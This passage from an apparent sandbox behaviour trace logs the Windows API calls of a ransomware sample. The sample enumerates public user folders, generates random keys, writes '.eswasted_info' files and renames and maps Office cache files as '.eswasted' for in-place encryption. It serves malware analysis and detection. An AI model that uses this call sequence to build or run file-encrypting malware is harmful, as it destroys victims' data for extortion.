ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.026] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*", lpFindFileData=0x70b3c8 | out: lpFindFileData=0x70b3c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x71f010 [0072.029] FindNextFileW (in: hFindFile=0x71f010, lpFindFileData=0x70b3c8 | out: lpFindFileData=0x70b3c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0072.029] FindClose (in: hFindFile=0x71f010 | out: hFindFile=0x71f010) returned 1 [0072.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3c8 | out: hHeap=0x6d0000) returned 1 [0072.030] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 0 [0072.030] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0072.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x13125e8 | out: hHeap=0x6d0000) returned 1 [0072.030] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName="Recorded TV", cAlternateFileName="RECORD~1")) returned 1 [0072.030] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\*", lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0072.030] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.030] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*", lpFindFileData=0x70b3c8 | out: lpFindFileData=0x70b3c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x71f010 [0072.031] FindNextFileW (in: hFindFile=0x71f010, lpFindFileData=0x70b3c8 | out: lpFindFileData=0x70b3c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0072.031] FindClose (in: hFindFile=0x71f010 | out: hFindFile=0x71f010) returned 1 [0072.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3c8 | out: hHeap=0x6d0000) returned 1 [0072.031] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 0 [0072.031] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0072.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x13125e8 | out: hHeap=0x6d0000) returned 1 [0072.031] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName="Videos", cAlternateFileName="")) returned 1 [0072.031] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\*", lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0072.031] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.031] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*", lpFindFileData=0x70b3c8 | out: lpFindFileData=0x70b3c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x71f010 [0072.032] FindNextFileW (in: hFindFile=0x71f010, lpFindFileData=0x70b3c8 | out: lpFindFileData=0x70b3c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0072.032] FindClose (in: hFindFile=0x71f010 | out: hFindFile=0x71f010) returned 1 [0072.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3c8 | out: hHeap=0x6d0000) returned 1 [0072.032] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x13125e8 | out: lpFindFileData=0x13125e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 0 [0072.032] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0072.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x13125e8 | out: hHeap=0x6d0000) returned 1 [0072.032] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName="Videos", cAlternateFileName="")) returned 0 [0072.032] FindClose (in: hFindFile=0x71ef90 | out: hFindFile=0x71ef90) returned 1 [0072.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717dd0 | out: hHeap=0x6d0000) returned 1 [0072.032] FindNextFileW (in: hFindFile=0x1312fa0, lpFindFileData=0x707bc0 | out: lpFindFileData=0x707bc0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0072.032] FindClose (in: hFindFile=0x1312fa0 | out: hFindFile=0x1312fa0) returned 1 [0072.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707bc0 | out: hHeap=0x6d0000) returned 1 [0072.032] FindNextFileW (in: hFindFile=0x6f5f18, lpFindFileData=0x6f5cc0 | out: lpFindFileData=0x6f5cc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x63006c, cFileName="Windows", cAlternateFileName="")) returned 1 [0072.032] FindClose (in: hFindFile=0x6f5f18 | out: hFindFile=0x6f5f18) returned 1 [0072.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0072.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7065a8 | out: hHeap=0x6d0000) returned 1 [0072.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f65a0 | out: hHeap=0x6d0000) returned 1 [0072.032] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0072.033] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0072.033] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.033] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 83 [0072.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2b0) returned 0x70b3c8 [0072.033] lstrcpyW (in: lpString1=0x70b46e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x70a2c8 [0072.033] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0072.034] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x70a2c8 | out: pbBuffer=0x70a2c8) returned 1 [0072.034] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.034] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0072.035] WriteFile (in: hFile=0x108, lpBuffer=0x70a2c8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x70a2c8*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.036] SetEndOfFile (hFile=0x108) returned 1 [0072.036] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a2c8 | out: hHeap=0x6d0000) returned 1 [0072.036] lstrcpyW (in: lpString1=0x70b46e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.036] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.eswasted")) returned 1 [0072.037] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0072.037] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0072.037] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x333 [0072.037] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x333) returned 0x330000 [0072.037] CloseHandle (hObject=0x10c) returned 1 [0072.042] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0072.043] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.043] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.043] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0072.043] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0072.043] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.054] SetEndOfFile (hFile=0x108) returned 1 [0072.056] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a2c8 | out: hHeap=0x6d0000) returned 1 [0072.056] CloseHandle (hObject=0x108) returned 1 [0072.058] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3c8 | out: hHeap=0x6d0000) returned 1 [0072.058] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b8e8 | out: hHeap=0x6d0000) returned 1 [0072.058] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0072.059] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0072.059] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.059] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0072.059] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x70b3c8 [0072.059] lstrcpyW (in: lpString1=0x70b460, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.059] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x70a2c8 [0072.059] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0072.060] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x70a2c8 | out: pbBuffer=0x70a2c8) returned 1 [0072.060] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.060] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0072.061] WriteFile (in: hFile=0x108, lpBuffer=0x70a2c8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x70a2c8*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.062] SetEndOfFile (hFile=0x108) returned 1 [0072.062] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.062] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a2c8 | out: hHeap=0x6d0000) returned 1 [0072.062] lstrcpyW (in: lpString1=0x70b460, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.062] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0072.063] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0072.063] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0072.063] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0xa40 [0072.063] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa40) returned 0x330000 [0072.063] CloseHandle (hObject=0x118) returned 1 [0072.066] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0072.067] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0072.067] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.067] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0072.067] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0072.067] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.086] SetEndOfFile (hFile=0x108) returned 1 [0072.088] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a2c8 | out: hHeap=0x6d0000) returned 1 [0072.088] CloseHandle (hObject=0x108) returned 1 [0072.089] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3c8 | out: hHeap=0x6d0000) returned 1 [0072.089] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b2d0 | out: hHeap=0x6d0000) returned 1 [0072.090] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0072.090] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0072.090] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.090] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0072.090] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ac) returned 0x6f65b8 [0072.091] lstrcpyW (in: lpString1=0x6f665a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0072.091] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0072.091] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0072.092] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0072.092] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0072.092] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0072.093] WriteFile (in: hFile=0x108, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0072.094] SetEndOfFile (hFile=0x108) returned 1 [0072.094] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.094] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0072.094] lstrcpyW (in: lpString1=0x6f665a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0072.094] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.eswasted")) returned 1 [0072.103] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.eswasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0072.103] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0072.104] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x10b2 [0072.104] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b2) returned 0x330000 [0072.104] CloseHandle (hObject=0x10c) returned 1 [0072.106] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, 